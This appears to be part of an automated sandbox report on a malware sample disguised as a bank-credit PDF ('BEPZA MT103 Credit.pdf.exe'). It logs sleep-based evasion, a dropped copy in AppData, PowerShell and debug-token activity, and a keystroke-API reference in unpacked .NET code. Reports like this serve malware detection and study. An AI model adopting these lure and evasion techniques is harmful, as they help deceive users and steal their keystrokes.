Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 594188	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6033	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3658	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Window / User API: threadDelayed 7300	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Window / User API: threadDelayed 2553	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Window / User API: threadDelayed 1821	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Window / User API: threadDelayed 8014	Jump to behavior

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 8112	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1748	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7916	Thread sleep count: 7300 > 30	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7916	Thread sleep count: 2553 > 30	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -597469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -596575s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -596343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -596234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -596015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -595687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -595140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -594921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -594811s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -594661s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe TID: 7852	Thread sleep time: -594546s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 5964	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7840	Thread sleep count: 1821 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7840	Thread sleep count: 8014 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -599769s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -599282s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -599157s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -599032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -598922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -598438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -598313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -598204s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -598079s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -597954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -597829s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -597704s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -597579s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -597454s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -597329s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -597204s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -597079s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -596954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -596829s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -596684s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -596359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -596141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -596032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -595907s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -595688s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -595563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -595438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -595312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -594962s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -594844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -594621s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -594516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -594406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -594297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe TID: 7860	Thread sleep time: -594188s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 596575	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 594921	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 594811	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 594661	Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Thread delayed: delay time: 594546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 599769	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 599157	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 599032	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 598204	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 597954	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 597829	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 597704	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 597579	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 597454	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 597329	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 597204	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 597079	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 596954	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 596829	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 596684	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 596032	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 595907	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 594962	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 594621	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 594516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe	Thread delayed: delay time: 594188	Jump to behavior

Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3711942483.0000000001001000.00000004.00000020.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3711945481.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
